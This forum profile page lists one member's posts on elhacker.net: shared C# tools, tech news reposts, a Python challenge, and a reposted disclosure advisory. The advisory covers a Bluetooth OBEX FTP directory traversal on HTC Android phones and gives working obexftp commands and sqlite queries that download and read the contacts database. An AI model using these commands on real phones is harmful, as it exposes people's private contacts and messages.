Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Novlucker

#4
Buenas,

Entre ayer y hoy se me dió por crear una pequeña tool que ni bien iniciada se minimiza al trayicon, y luego va "cronometrando" el tiempo que se pasa en una ventana. El registro lo guarda o bien en formato de texto (esta "hardcodeado" el formato), o bien en XML.

Para que se hagan una idea, el XML es más o menos así;

Código (xml) [Seleccionar]
<?xml version="1.0" encoding="utf-8"?>
<ArrayOfWatchedWindow xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <WatchedWindow>
    <Executable>c:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\IDE\devenv.exe</Executable>
    <ProcessId>5492</ProcessId>
    <WindowText>WinWatcher (Running) - Microsoft Visual Studio</WindowText>
    <ElapsedTime>00:00:01</ElapsedTime>
  </WatchedWindow>
  <WatchedWindow>
    <Executable>C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Executable>
    <ProcessId>6048</ProcessId>
    <WindowText>(37) Twitter - Google Chrome</WindowText>
    <ElapsedTime>00:00:16</ElapsedTime>
  </WatchedWindow>
  <WatchedWindow>
    <Executable>C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Executable>
    <ProcessId>6048</ProcessId>
    <WindowText>Foro de elhacker.net - Índice - Google Chrome</WindowText>
    <ElapsedTime>00:01:13</ElapsedTime>
  </WatchedWindow>
  <WatchedWindow>
    <Executable>C:\Program Files (x86)\Windows Media Player\wmplayer.exe</Executable>
    <ProcessId>6276</ProcessId>
    <WindowText>Reproductor de Windows Media</WindowText>
    <ElapsedTime>00:00:03</ElapsedTime>
  </WatchedWindow>
</ArrayOfWatchedWindow>


La jerarquía en base a la cual se cronometran las ventanas es justamente la que se ve en el XML; Ejecutable > PID de proceso > Texto de ventana

Existen dos momentos en los que se vuelcan los datos a archivo;
  • Cada 15 minutos
  • Al cerrar la aplicación

Con click derecho en el icono del trayicon se puede cambiar la configuración y ver el log actual sin necesidad del volcado :)

Descarga de código fuente: http://bit.ly/WinWatcher (C# Visual Express 2010)

Le quería dar un uso personal, pero tal vez luego le haga alguna mejora y/o refactoring de código, porque se por ejemplo que tiene un bug conocido, si en un navegador se cambia de pestaña no se refleja hasta bien no se minimize y vuelva a restaurar la ventana, y esto es porque preferí hookear el cambio de ventana en lugar de hacer polling con un timer, así que al cambiar de tab no se entera :-X

Cualquier consulta y/o comentario ya saben

Saludos
#5
Foro Libre / Las discusiones del foro ...
2 Noviembre 2012, 13:29 PM
Al ver la imagen la asocié con el foro inmediatamente ...


:xD
#6
Buenas,

Hace algunos días y por cosas que no vienen al caso, se me dió por crear una pequeña tool (aplicación de consola) que se encarga de parsear N fuentes de datos, extraer IP's, geocalizarlas y volcarlas a un archivo KML (este tipo de archivos puede cargarse en Google Earth y Google Maps entre otros).

La idea de este post es justamente compartir la tool que he mencionado antes.

Comentarios generales:

  • Aplicación de consola (como ya he mencionado).
  • Utiliza la base de datos y las clases de Maxmind.
  • Utiliza commandline para el parseo de los parámetros de línea de comandos.
  • Extensible haciendo uso de MEF (Managed Extensibility Framework). Dado que la aplicación puede recibir datos de entrada de N fuentes, lo que hice fue crear un componente "parser". De este modo solo basta con crear un nuevo "parser" (dll) para que dinámicamente la aplicación los reconozca y pueda hacer uso de ellos (solamente deben de agregarse dentro de la carpeta "Extensions").

    En el source van 4 parsers básicos que he desarrollado:
    • Connections: identifica las conexiones actuales de la máquina, similar a netstat.
    • Pcap: extrae IPs de un archivo de captura de red pcap (de Wireshark por ejemplo).
    • PlainText: cualquier archivo que pueda ser reconocido como de texto.
    • Web: obtiene IPs desde una url especificada.

Ejemplo de uso:
Código (dos) [Seleccionar]
C:\IpToKml\IpToKml\bin\Release>IpToKml.exe

Available Parsers:
       + Connections
       + Pcap
       + PlainText
       + Web

Usage:
       IpToKml.exe ParserName --help

C:\IpToKml\IpToKml\bin\Release>IpToKml.exe web --help


 u, url    Required. Url del sitio web.
 help      Display this help screen.

C:\IpToKml\IpToKml\bin\Release>IpToKml.exe web -u "http://www.malwaredomainlist.com/mdl.php?search=&colsearch=All&quantity=All"

21:44:39 Parsing Started
21:44:46 Parsing Completed
21:44:46 Finalizing
       Available IP Addresses : 2103
       Unavailable IP Addresses : 9
       Total IP Addresses : 2112
21:44:47 Output File C:\Dropbox\WEB_251020124439.kml

C:\IpToKml\IpToKml\bin\Release>



Configuración:
Para poder utilizarlo correctamente hay que cambiar dos settings en el config de la aplicación (IpToKml.exe.config)
Código (xml) [Seleccionar]
<?xml version="1.0"?>
<configuration>
 <appSettings>
   <!--Ruta completa al archivo dat de la base de datos de IP-->
   <add key="GeoIpDb" value="C:\GeoIpDb\GeoLiteCity.dat"/>
   <!--Carpeta de salida para los KML generados-->
   <add key="KmlFolder" value="C:\Dropbox\"/>
 </appSettings>
</configuration>


Descarga de código fuente: http://bit.ly/IpToKml (C# Visual Express 2010)

Cualquier consulta y/o comentario ya saben ;)

Saludos
#7
No nos van a dejar tranquilos ni en agosto, sobre todo teniendo en cuenta la importancia de la noticia, y es que tal y como leéis en el titular, Google se hace con la empresa americana Motorola, más concretamente, la división encargada del negocio móvil.

La adquisición de la división Motorola Mobility de la histórica empresa de telecomunicaciones americana está valorada en 12.500 millones de dólares. Así podemos leerlo, de forma oficial en el blog de Google, a puño y letra de Larry Page.

La compra parece tener una intención bastante clara, tal y como os informamos hace unos días,Motorola tiene potente propiedad intelectual en su haber que le permite defenderse de todos los movimientos de patentes que estamos sufriendo en el panorama de la tecnología móvil. Justamente esto era lo que nos estaba Google anunciando hace unas semanas, pagar con la misma moneda.

La adquisición no implica ningún cambio en la filosofía Android como plataforma abierta, Motorola licenciará el sistema de la misma forma que lo ha estado haciendo desde que decidió formar parte de la Open Handset Alliance. Ambas empresas funcionarán como negocios separados.

Aunque intenten dejar el punto anterior bastante claro, será curioso empezar a conocer las opiniones del resto de fabricantes que apuestan por Android, ahora que Motorola estará manejada por la propia Google, y lógicamente tendrá alguna ventaja sobre el resto a la hora de confeccionar dispositivos, o recibir actualizaciones del sistema.

Del comunicado también podemos extraer algún mensaje dirigido a la competencia:

CitarHemos explicado recientemente como compañías como Apple y Microsoft se han unido en los ataques de patentes contrarias a la competencia en Android. El Departamento de Justicia de los Estados Unidos ha tenido que intervenir en los resultados de una subasta de patentes recientes para de esa forma "proteger la competencia y la innovación en la Comunidad del software de código abierto" y está estudiando los resultados de la subasta de Nortel.La adquisición de Motorola Mobility permitirá aumentar la competencia mediante el fortalecimiento de la cartera de patentes de Google, que nos permitirá proteger mejor a Android de las amenazas anticompetitivas por parte de Apple y Microsoft entre otras compañías.

En Xataka hemos estado siguiendo en las últimos días este tema, por si andáis un poco perdidos, os dejo con los enlaces en orden cronológico:


Fuente:http://www.xataka.com/moviles/google-adquiere-motorola-mobility-por-12500-millones-de-dolares
#8
Aquí podéis encontrar el informe completo de la vulnerabilidad.

Title: HTC / Android OBEX FTP Service Directory Traversal
Author: Alberto Moreno Tablado
Vendor: HTC
Vulnerable Products:
- HTC devices running Android 2.1
- HTC devices running Android 2.2

Summary

HTC devices running Android 2.1 and Android 2.2 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and read arbitrary files, via a ../ in a pathname.

Description

In the present HTC / Android phones include a Bluetooth stack, which provides Bluetooth communications with other remote devices. The File Transfer Profile (OBEX FTP) is one among all the Bluetooth services that may be implemented in the stack.

The OBEX FTP service is a software implementation of the File Transfer Profile (FTP). The File Transfer Profile (FTP) is intended for data exchange and it is based on the OBEX communications client-server protocol. The service is present in a large number of Bluetooth mobile phones. This service can be used for sending files from the phone to other remote devices and also allows remote devices to browse shared folders and download files from the phone.

In HTC / Android phones, the default directory of the OBEX FTP Server is the SDCard. Only files placed in the directory of the SDCard can be shared. The user cannot select other directory so sensitive files related to the operating system are not exposed.

There exists a Directory Traversal vulnerability in the OBEX FTP Service in the Bluetooth Stack implemented in HTC devices running Android 2.1 and Android 2.2. The OBEX FTP Server is a 3rd party driver developed by HTC and installed on HTC devices running Android operating system, so the vulnerability affects to this vendor specifically.

A remote attacker (who previously owned authentication and authorization rights) can use tools like ObexFTP or gnomevfs-ls over Linux to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks.

The only requirement is that the attacker must have authentication and authorization privileges over Bluetooth. Pairing up with the remote device should be enough to get it. However, more sophisticated attacks, such as sniffing the Bluetooth pairing, linkkey cracking and MAC address spoofing, can be used in order to avoid this. In case the attacker succeeded in getting the proper privileges, further actions will be transparent to the user.

Scope of the attack

The Directory Traversal vulnerability allows a remote attacker to browse folders located anywhere in the file system and download any file contained in any folder.

1) List arbitrary directories

Any directory within the file system of the phone can be browsed, beyond the limits of the default shared folder (the SDCard).

The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the path ../, the command retrieves the content of the parent of the default directory of the FTP server, this is the root directory of the disk file system:

gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -l "../"
Browsing 90:21:55:8C:2C:3A ...
Connecting..\done
Tried to connect for 29ms
Receiving "../"... Sending ".."...|done
/<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder/>
<folder name="sqlite_stmt_journals"/>
<folder name="config"/>
<folder name="sdcard"/>
<folder name="d"/>
<folder name="etc"/>
<folder name="cache"/>
<folder name="system"/>
<folder name="sys"/>
<folder name="sbin"/>
<folder name="proc"/>
<file name="logo.rle" size="11336" user-perm="R" created="19700101T090000Z"/>
<file name="init.rc" size="14664" user-perm="R" created="19700101T090000Z"/>
<file name="init.goldfish.rc" size="1677" user-perm="R" created="19700101T090000Z"/>
<file name="init.buzz.rc" size="3608" user-perm="R" created="19700101T090000Z"/>
<file name="init" size="107668" user-perm="R" created="19700101T090000Z"/>
<file name="default.prop" size="118" user-perm="R" created="19700101T090000Z"/>
<folder name="data"/>
<folder name="root"/>
<folder name="dev"/>
</folder-listing>done
Disconnecting..-done


2) Read arbitrary files

Any file located in the file system can be downloaded. This may lead to access confidential data such as contacts, messages, emails or temporary internet files.

- Emails from Google account downloaded via GMAIL application, located in /data/data/com.google.android.providers.gmail/databases/mailstore.*****@gmail.com.db
- Contacts database, located in /data/data/com.android.providers.contacts/databases/contacts2.db.

The following example is the output of a command for downloading a file with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the pathname ../data/data/com.android.providers.contacts/databases/contacts2.db, the command retrieves the contacts database:

gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -g "../data/data/com.android.providers.contacts/databases/contacts2.db"
Browsing 90:21:55:8C:2C:3A ...
Connecting..\done
Tried to connect for 50ms
Receiving "../data/data/com.android.providers.contacts/databases/contacts2.db"... Sending ".."...|Sending "data".../Sending "data"...-Sending "com.android.providers.contacts"...\Sending "databases"...|done
/done
Disconnecting..-done


Once the database is downloaded, contacts can be queried with SQL:

gospel@ubuntu:~$ ./sqlite3 contacts2.db "SELECT data.data1 from data INNER JOIN raw_contacts ON data.raw_contact_id = raw_contacts._id WHERE raw_contacts.account_type='com.htc.android.pcsc'"
08012341234
Philip J. Fry
pjfry@planex.com
...


Also contacts synced from Google and Facebook accounts can be queried from the same database:

gospel@ubuntu:~$ ./sqlite3 contacts2.db "SELECT data.data1 from data INNER JOIN raw_contacts ON data.raw_contact_id = raw_contacts._id WHERE raw_contacts.account_type='com.htc.socialnetwork.facebook'"
*********
Aitana *******
Aitana *******
********@gmail.com
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs712.ash1/******_*********
*_*******_*.jpg
...


Affected products

- HTC devices running Android 2.1
- HTC devices running Android 2.2

The following products were tested and showed to be vulnerable: HTC Wildfire A3333, Softbank 001HT (HTC Desire HD), EMobile S31HT (HTC Aria).

Vendor status

This vulnerability is related to CVE-2009-0244, a vulnerability announced in 2009 affecting HTC devices running Windows Mobile 6 and Windows Mobile 6.1 and reported to HTC Europe. After the vulnerability was disclosed, HTC issued security hotfixes under the name <span style="font-style:italic;">Hotfix to enhance the security mechanism of Bluetooth service</span> for all the affected products. HTC reproduced the same security flaw in Android phones shipped throughout 2010 and 2011.

The current advisory was reported to HTC Japan in 2011/02. Subsequently, it was reported to HTC Europe in 2011/04 in order to obtain more feedback and re-attempt the collaboration. In both cases I failed to coordinate the disclosure of the advisory and release of the hotfix so finally I am forced to go public with all the information undisclosed.

The vulnerability is published as a zero-day threat. This means that all HTC devices running Android 2.1 and Android 2.2 shipped up to date July 2011 may be vulnerable and a security hotfix has not been issued by the manufacturer yet.

Users of HTC Android phones may expect to receive a notification for security update over-the-air regarding to this vulnerability, or find the latest updates in the support site.

Do not accept pairing nor connection requests from unknown sources. Delete old entries in the paired devices list.

HTC Wildfire, HTC Desire HD and HTC Aria are trademarks of HTC Corporation (HTC). Softbank 001HT is a trademark of SOFTBANK Corp. EMobile S31HT is a trademark of EMOBILE Ltd.
#9
Abro el post simplemente para dejar enlace para descargar un eBook/pdf sobre WQL en Powershell que esta realmente muy bien.

Es free y esta en inglés: http://bit.ly/juWnQU

Saludos
#10
RSA es una de las compañías de seguridad más importantes a nivel mundial. Han emitido un comunicado oficial en el que admiten que su seguridad interna se ha visto comprometida por atacantes y que han robado información relativa a su famoso producto SecurID. El problema es tan grave que involucra al gobierno de los Estados Unidos.

Arthur W. Coviello, Jr., director ejecutivo de RSA ha emitido un comunicado en el que confiesa que RSA ha sido víctima de un "ataque cibernético extremadamente sofisticado" que, por lo que se deduce, viene de tiempo atrás y ahora ha sido detectado. Esto es lo que se llama un ATP (Advanced Persistent Threat), en resumen, un ataque específicamente diseñado contra la compañía, por el que los atacantes obtienen acceso a información interna confidencial. Habitualmente estos ataques llevan meses de preparación y es necesaria una importante investigación posterior para ver cómo y cuándo comenzó. Sobre todo, hasta dónde han llegado.

Al parecer lo que se sabe es que han tenido acceso a "cierta" información relacionada con uno de sus productos estrella: SecurID. Se trata de un token físico que proporciona autenticación segura de dos factores (algo que se sabe y algo que se tiene). En vez de necesitar una sola contraseña para acceder a cualquier recurso, con el token es necesario un PIN y un número de seis cifras que genera el propio dispositivo. Ese código sólo es válido durante un tiempo limitado. Es utilizado por grandes compañías concienciadas con la seguridad para, habitualmente, acceso externo a las redes.

Según el comunicado, la información robada podría "reducir la efectividad de la implementación actual de la autenticación de dos factores". ¿Qué quiere decir esto? Realmente toda deducción no serán más que especulaciones, pero es posible que los ladrones hayan tenido acceso a información que permita deducir de qué forma se calculan las contraseñas de un solo uso y, por tanto, permitir a un atacante acceder a recursos ajenos sin necesidad de disponer del token físico. Pero no es posible asegurarlo en estos momentos. Además, el atacante necesitaría también el PIN del atacado, que es algo que, supuestamente, solo debería estar en la memoria del usuario.

Ante la gravedad del asunto, EMC (a la que pertenece RSA) ha rellenado un formulario llamado 8-K. Se trata de un documento gubernamental que se utiliza para informar de un evento importante e inesperado a la "U.S. Securities and Exchange Commission"

Hay que tener en cuenta que, como ha ocurrido en otras ocasiones con el robo de material secreto en empresas, a la larga puede hacerse público. Hoy en día podemos encontrar en redes P2P y puntos de descarga directa, desde partes del código fuente de Windows y del antivirus de Kaspersky, hasta todos los correos privados del último año del dueño la compañía de seguridad HBGary.

Quizás resulte extraño que una empresa dedicada por entero a la seguridad, y que lleva el nombre de los inventores de la criptografía moderna, haya sido comprometida. Pero es necesario recordar que esto ha pasado en los últimos años con muchas empresas importantes, desde Google a la propia HBGary (a la que destriparon por completo), y que nadie está a salvo de ataques si son lo suficientemente sofisticados.

Los consejos que da RSA a sus clientes son muy genéricos por ahora. Básicamente, mejorar la seguridad y estar más atentos. Pide, especialmente, concentrarse en "social media applications".

Además del golpe a la imagen, suponemos que es posible que RSA deba en un futuro cercano, o bien actualizar o bien reemplazar todos los tokens de sus clientes para garantizar su seguridad, lo que supondrá igualmente un coste económico importante para la compañía.

Fuente:http://www.hispasec.com/unaaldia/4528
#11
Ayer mismo fue lanzado lanzado Internet Explorer 9, incluyendo innumerables mejoras tanto en cuanto a adopción de estándares y rendimiento (sobre todo comparando esta versión con su predecesora). Entre ellas, como ya comentó mi compañero Miguel López, están la adopción del tag <video> de HTML5, que permite reproducir vídeos en el navegador sin necesidad de plugins adicionales. La gracia está en que cada navegador, de momento, incluye soporte para unos determinados formatos.

Por ejemplo, Safari e Internet Explorer 9 incluyen soporte para vídeos codificados mediante H.264, mientras que Chrome ya no lo hace (quedándose con WebM, igual que Firefox). Dado que Chrome retiró el soporte para H.264 Microsoft decidió lanzar un plugin para el navegador de Chrome que permite reproducir vídeos que requieren ese códec.

Y ahora es Google quien devuelve la pelota, lanzando un plugin para que Internet Explorer obtenga soporte para WebM. Éste es compatible con las mismas plataformas en las que funciona Internet Explorer 9, Windows Vista y Windows 7, y como podemos imaginar es gratuito. Por nuestra parte quedamos a la espera de que se defina un formato estándar de vídeos (y, a poder ser, abierto), aunque lanzar complementos de éste tipo de momento no es mala solución para poder ver los vídeos disponibles en este formato.

Fuente:http://www.genbeta.com/multimedia/google-lanza-plugin-de-webm-para-internet-explorer-9
#12
SourceForge liberó Allura, el software que permite entregar su servicio, bajo una licencia open source Apache 2.0. El desarrollo del proyecto Allura comenzó en 2009 y en la actualidad SourceForge.net está ejecutando una instancia de Allura (aka "New Forge" o Forge 2.0).

Allura es una aplicación basada en Python que hace uso de la base de datos MongoDB (NoSQL), el servidor de búsqueda SOLR y la plataforma de mensajería RabbitMQ, para entregar repositorios, wikis, trackers y foros a los usuarios que les permita gestionar sus proyectos.

Allura lanzó una versión previa en febrero, pero con su lanzamiento completo esperan aprovechar el PyCon 2011 (Atlanta, 9-17 de marzo) para crear una comunidad de desarrolladores.

Fuente:http://www.fayerwayer.com/2011/03/sourceforge-net-libera-su-codigo-fuente/
#13
Microsoft acaba de anunciar el lanzamiento oficial de la versión final de Internet Explorer 9 el próximo 14 de marzo. En el comunicado, la compañía por medio de Ryan Gavin, director senior de IE9, comunicaba al respecto que:

"Desarrolladores y diseñadores están creando una web hermosa para todos nosotros. Publicaremos la versión final de Internet Explorer 9 lista para su descarga a partir de las 21:00 PM (Pacífico) 06:00 de la mañana en España"

El lanzamiento se produce tras casi un año desde el primer anuncio de IE9. Durante todo este tiempo ha pasado por hasta ocho versiones de prueba, una beta y la Plattform Preview. Mientras, veía como el resto de navegadores adquirían cada vez más fuerza, caso de Firefox y, sobre todo, Chrome.

IE9 llegará con grandes novedades, pero destaca la inclusión y apuesta de soporte para HTML5 o la aceleración de vídeo a través de hardware. Otra de las cualidades que mejora tienen que ver con las listas o Tracking Protection List, un sistema que potenciará la privacidad de los usuarios frente al rastreo de datos por parte de las empresas.

Poco más que decir. Esperamos ansiosos la llegada del 14 de marzo, ese día comenzará una vez más la batalla entre navegadores por hacerse con el usuario.

Fuente:http://bitelia.com/2011/03/es-oficial-internet-explorer-9-sale-el-14-de-marzo

#14
La empresa de Steve Jobs ha solicitado que el nombre 'App Store' sea reconocido como propiedad de su compañía.Apple alude a que el término da nombre a su servicio y reivindica su exclusividad. Tras realizar la solicitud se ha encontrado con un enemigo en su camino. Los abogados de Microsoft defienden que "Apple no puede bloquear a los competidores el utilizar un nombre genérico".

La oficina de marcas y patentes americana debe decidir si las palabras 'App Store' se puede entender como un término ligado a Apple o es un concepto general ya que, al fin y al cabo, significa tienda de aplicaciones.

La postura de Microsoft al respecto es clara. En declaraciones de sus abogados recogidas por el portal Techflash, la compañía ha dicho que "cualquier significado alternativo o la fama de Apple vinculada a 'App Store' es un hecho secundario que no puede un término genérico como este en una marca de protección".

Los abogados de Microsoft entienden que la abreviación 'app' (elegida precisamente como palabra de 2010) es común en el mundo de las aplicaciones y su uso no puede ser limitado por su similitud con la palabra Apple.

Apple por su parte defiende su postura explicando que la gente conoce el término en relación al servicio de su compañía. "El uso de la expresión 'App Store' en la prensa especializada es muy frecuente, lo que supone una referencia a la marca de Apple y los servicios prestados en virtud del mismo" han sido las declaraciones de la compañía recogidas por Techflash.

La presión de Microsoft puede encontrar apoyo en el resto de las rivales de Apple. Microsoft asegura que su servicio de aplicaciones y el de otras compañías como Google han tenido que adaptar sus nombres para no utilizar la denominación 'App Store'. La lucha entre las compañías está servida

Fuente:http://www.20minutos.es/noticia/925938/0/apple/microsoft/app-store/
#15
Noticias / OCZ dejará de vender memoria RAM
12 Enero 2011, 17:20 PM
OCZ es una empresa que ha incursionado exitosamente en varios mercados asociados a PCs gamer, por lo que hoy podemos encontrar fuentes de poder, SSDs, flash drives, soluciones de refrigeración, etc. en su catálogo, pero lo que ya no veremos son su conocida gama de chips de memoria RAM, pues esta área será cerrada antes de que termine el año fiscal de la compañía en febrero.

Los motivos para esta decisión parecen ser meramente económicos, pues el mercado de memoria DRAM no parece ser muy rentable, hasta el punto que el 78% de las ganancias de OCZ este año vinieron de su división de SSDs, dejando el 22% restante compartido entre sus productos de memoria flash, fuentes de poder y memoria RAM, por lo que realmente no hay por donde perderse.

ara mantener su reputación intacta, OCZ mantendrá sus acuerdos pre existentes con fabricantes de placas madres que solicitaron módulos especiales de RAM para sus productos, pero más allá de eso sólo quieren hacer un cierre limpio.

Fuente:http://www.chw.net/2011/01/ocz-dejara-de-vender-memoria-ram/
#16
Scripting / [RETO+Python] Buscando rangos
12 Enero 2011, 15:12 PM
He aquí un nuevo reto a ver quién lo tiene más corto >:D

El input del programa será una lista de números mayores a 0 ordenados y separados por espacios.
El script debe de encontrar rangos de números consecutivos y agruparlos, y dejar los que no estan consecutivos separados.
El output serán esos rangos separados por coma y espacio.

Ej:
INPUT: 1 2 5 8 9 10 11 18
OUTPUT: 1-2, 5, 8-11, 18

INPUT: 3 6 9 10 12 13
OUTPUT: 3, 6, 9-10, 12-13


Saludos!
#17
Google está yendo paso a paso con su acortador de URLs. Primero llegó goo.gl cerrado, usado sólo por FeedBurner y Google Toolbar (Maps llegó más tarde). Después, lo puso disponible para que cualquiera pudiese acortar con goo.gl. Eso sí, sólo desde su web.

Hoy ya se puede decir que Google tiene un acortador completo gracias a la apertura de su API. Con ella, cualquier programador puede acortar URLs o expandirlas con goo.gl desde su programa, así que dentro de poco clientes como Twitter o Seesmic podrían incluir este acortador, además de las más que probables extensiones y bookmarklets para navegadores.

Según Google, goo.gl es más rápido y más seguro que el resto de acortadores. Aunque no lo pongo en duda, las diferencias entre este y otros acortadores son tan pequeñas que apenas se notan. Por lo tanto, no creo que pueda competir con todo lo que ofrecen acortadores ya asentados, Bit.ly principalmente.

Fuente:http://www.genbeta.com/web/googl-ya-tiene-api-y-puede-ser-integrado-en-cualquier-programa
#18
Nuevo 0 day en Windows. Microsoft acumula al menos cinco vulnerabilidades graves sin solucionar

Mal comienzo de año para Microsoft. Con la última publicación de una vulnerabilidad que permite la ejecución de código, Microsoft acumula al menos cinco vulnerabilidades recientes graves sin parchear. Además, 2010 ha sido un año récord para Microsoft en el que se han corregido más vulnerabilidades que cualquier otro. Esto, aunque no es necesariamente un dato "negativo", indica que a Microsoft se le empieza a acumular el trabajo.Si 2010 ha sido un año con muchas vulnerabilidades en Windows (además se batió el récord de número de vulnerabilidades corregidas en un solo mes en sus productos en octubre), 2011 no comienza mejor. Aunque se tenían indicios (sin muchas pruebas) sobre el fallo desde el día 23 de diciembre, finalmente el día 4 de enero Microsoft ha declarado que existe una grave vulnerabilidad en su intérprete de gráficos, concretamente en la librería shimgvw.dll. Y lo ha declarado porque finalmente ha salido a la luz (una vez más a través de Metasploit) un exploit para aprovechar el fallo. El problema se da en todos los sistemas operativos vigentes excepto Windows 7 y 2008 R2 y permite que un atacante ejecute código con solo enviar a la víctima un archivo thumbnail, o hacer que lo visualice de alguna forma.

Microsoft recomienda renombrar o eliminar los permisos a todos los usuarios para acceder a %WINDIR%\SYSTEM32\shimgvw.dll. Esto tendrá un impacto indeterminado sobre las aplicaciones que utilicen esta librería.

Con este fallo, Microsoft acumula al menos cinco vulnerabilidades graves y recientes en sus sistemas operativos que todavía no han sido solucionadas. En concreto:

  • Michal Zalewski acaba de hacer público que, a través de su nueva herramienta de fuzzing, ha descubierto una denegación de servicio en Internet Explorer 8 que, muy probablemente, acabará permitiendo la ejecución de código. Según él, "looks like EIP is pretty much fully attacker-controlled." (parece que el registro EIP es bastante controlable por completo por el atacante). Todavía no se ha demostrado y se sospecha que es conocido por terceras partes no demasiado confiables que podrían estar usándolo.

  • Un fallo al procesar los CSS de Internet Explorer permite la ejecución de código. Descubierto a principios de diciembre como denegación de servicio y redescubierto como vulnerabilidad de ejecución de código el 14 de diciembre. Existe exploit público.

  • Un fallo en el componente Windows Fax Cover Page Editor (fxscover.exe) de todos los Windows que permite la ejecución de código si la víctima abre un archivo con extensión .cov especialmente manipulado. Descubierto el 26 de diciembre y con exploit público.

  • Un problema de elevación de privilegios en el kernel desde finales de noviembre. Existe exploit público.

  • Un fallo en la librería Data Access Objects (dao360.dll) que permite la ejecución de código, relacionada con el DLL "hijacking". Descubierto a finales de octubre.

Además, acumula otras vulnerabilidades recientes sin parchear en sus herramientas de administración WMI, en el servidor FTP de IIS versión 7... y otras menos graves que acumula desde principios de 2010.

El 11 de enero se esperan nuevos boletines de seguridad de Microsoft, pero muy probablemente sólo se corrijan algunos de estos problemas en ellos.

Fuente:http://www.hispasec.com/unaaldia/4456
#19
Noticias / China declara ilegal a Skype
30 Diciembre 2010, 19:22 PM
Aunque suene a broma, la noticia no puede ser más cierta y triste a la vez. Cada vez más surrealista, los medios estatales acaban de anunciar el servicio de VoiP ilegal en el país. Qué difícil debe ser vivir en un país en el que las libertades tienen cerco y la tecnología sólo puede ser utilizada al servicio del Partido Comunista. El caso es que el gobierno chino ha prohibido las llamadas telefónicas por Internet ilegales a excepción de aquellas realizadas a través de las dos redes propiedad estatal, China Unicom y China Telecom. Skype pasa a ser ilegal en el país.

Ha sido el diario People's Daily, órgano oficial del Partido Comunista, el encargado de oficializar la noticia, afirmando que los servicios como Skype disponibles en el país, dejarían de funcionar. Esta nueva prohibición se une a los bloqueos y cierres que ya han tenido en el país otras webs como Facebook, Twitter, YouTube o la misma Google, quién cerró el año pasado tras fuertes presiones del gobierno.

Durante el día de ayer, Wang Chen, director adjunto del Departamento de Propaganda chino, dijo, jactándose de ello y en palabras que hoy resultan premonitorias:

"Durantes el mes de noviembre, 350 millones de informaciones nocivas, incluyendo textos, fotos y vídeos, se suprimieron de la red en China. Estamos llevando a cabo con las autoridades pertinentes una campaña para reprimir a los ilegales servicios de Voz sobre Protocolo de Internet de teléfono"

Desde Twitter, ya comienzan a haber las primeras réplicas a la nueva postura del Partido, donde varios usuarios han afirmado que ya no existe la opción de descargar Skype. Noticias como estas siempre son un jarro de agua fría para la sociedad y el desarrollo de las libertades. Ojalá lo vuelvan a instaurar pronto, aunque mucho me temo que no será así.

Fuente:http://bitelia.com/2010/12/china-declara-ilegal-a-skype
#20
Ha sido publicado un exploit para una vulnerabilidad en Internet Explorer que posibilita la ejecución de código remoto. Hasta el momento Microsoft no ha publicado ningún parche, por lo que todos los usuarios son vulnerables.

La vulnerabilidad es provocada por un error en el motor de renderizado HTML de Internet Explorer (mshtml.dll) al manejar hojas de estilo .CSS. Un atacante puede explotarlo para ejecutar código y evadir las características de seguridad "Data Execution Prevention" (DEP) y "Address Space Layout Randomisation" (ASLR).

Hay reportes que indican que el exploit se vió por primera vez en China, Metasploit ya ha publicado el código del exloit y Abysssecya han publicado un video con la demostración de la explotación.

Investigadores de la compañía de seguridad VUPEN ha comprobado que la vulnerabilidad puede ser explotada en Internet Explorer 8 en Windows 7, Vista SP2 y XP SP3 así como en Internet Explorer 7 y 8 sobre Windows XP SP3.

Microsoft ha dicho que están investigando el fallo, pero no se ha anunciado el lanzamiento de un parche. Por ahora es recomendable tener habilitado el modo protegido de Internet Explorer 7 y 8 para limitar el impacto de los ataques.

Fuente:http://blog.segu-info.com.ar/2010/12/exploit-para-una-vulnerabilidad-0-day.html
#21
"Si se aprueba la ley Sinde, esta página desaparecerá. Internet será una tele más, al servicio del poder. Por la libertad de expresión en la Red. No a la censura. No a la Ley Sinde. No al cierre de webs". Este era el mensaje que el pasado domingo se podía leer en las páginas de descargas y streaming más importantes de España, que se tiñeron de negro como protesta por la ley Sinde.

Sin embargo, este martes fueron las distribuidoras las que vistieron sus webs de luto para reclamar una norma que las proteja de la piratería y evitar de esta manera despidos. Así, en la web de Alta Films se podía leer: "Esta distribuidora desaparecerá y 235 personas se irán a la calle en breve si no se aprueba con urgencia una ley que nos proteja contra las descargas ilegales y la piratería".

Mensajes similares se pueden ver en las páginas de Versus Entertainment (cuyo texto señala que 10 personas se irían a la calle), Divisa Red (60 personas), Cameo (9 personas) o Karma Films (12 personas). También se han unido a esta iniciativa Canal Ocio (93 personas se irían a la calle) o la Asociación de Empresas del Vídeo, cuya web muestra el texto: "esta asociación, más de dos mil empresas y miles de trabajadores se irán a la calle en breve" si no se aprueba una norma antipiratería.

Y es que este martes se debatió en el Congreso el proyecto de Ley de Economía Sostenible, donde se recoge la disposición conocida como ley Sinde, que no fue aprobada.

Fuente:http://www.20minutos.es/noticia/909965/0/luto/distribuidoras/sinde/
#22
La Asamblea Nacional de Venezuela aprobó ayer la llamada "Ley de Responsabilidad Social en Radio, Televisión y Medios Electrónicos" (conocida como Ley Resorte), que amplía las facultades que tiene el gobierno de Hugo Chávez para controlar los contenidos que se publican en Internet. La ley suma a los medios electrónicos a lo que ya se aplicaba a Radio y TV, incluyendo la prohibición de publicar contenidos "ofensivos", "violentos" y que:

